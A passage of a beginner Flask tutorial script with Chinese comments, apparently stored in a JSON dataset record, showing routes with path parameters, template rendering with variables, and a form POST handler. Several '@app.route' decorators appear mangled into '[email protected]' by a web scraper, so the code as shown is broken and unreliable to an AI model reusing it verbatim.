protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s'%name\n\n#通过访问路径,获取用户的整形参数 此外,还有float类型\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d'%id\n\n#返回给用户渲染后的网页文件\n# @app.route('/index1')\n# def index1():\n# return render_template(\"index.html\")\n\n#向页面传递变量\[email protected]('/index1')\ndef index2():\n time = datetime.date.today() #普通变量\n name = ['小新','小英','小红'] #列表类型\n task = {\"任务\":\"打扫卫生\",\"时间\":\"3小时\"} #字典类型\n return render_template(\"index.html\",var = time,list = name,task = task)\n\n#表单提交\[email protected]('/test/register')\ndef register():\n return render_template(\"test/register.html\")\n\n#接受表单提交的路由,需要指定methods为post\[email protected]('/result',methods = ['POST','GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template(\"test/result.html\",result = result)\n\nif __name__ == '__main__':\n app.run(debug=True)", "step-ids": [ 5, 6, 7, 9, 10 ] }
[ 5, 6, 7, 9, 10 ]